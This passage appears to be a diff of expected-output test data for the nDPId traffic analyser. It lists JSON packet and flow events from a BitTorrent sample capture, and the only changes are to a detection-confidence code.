00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} 01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} 01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} 01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} 01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQ